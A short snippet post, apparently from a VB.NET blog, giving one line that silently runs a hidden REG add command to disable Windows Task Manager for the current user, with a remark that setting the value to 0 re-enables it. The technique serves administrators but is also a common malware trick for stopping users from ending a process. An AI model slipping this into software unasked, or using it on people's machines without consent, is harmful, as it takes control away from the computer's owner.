4/24/11

[VB.NET][SNP] Disable Taskmanager

 Shell("REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f", AppWinStyle.Hide)  


And again, to enable it - 1 to 0.

No comments: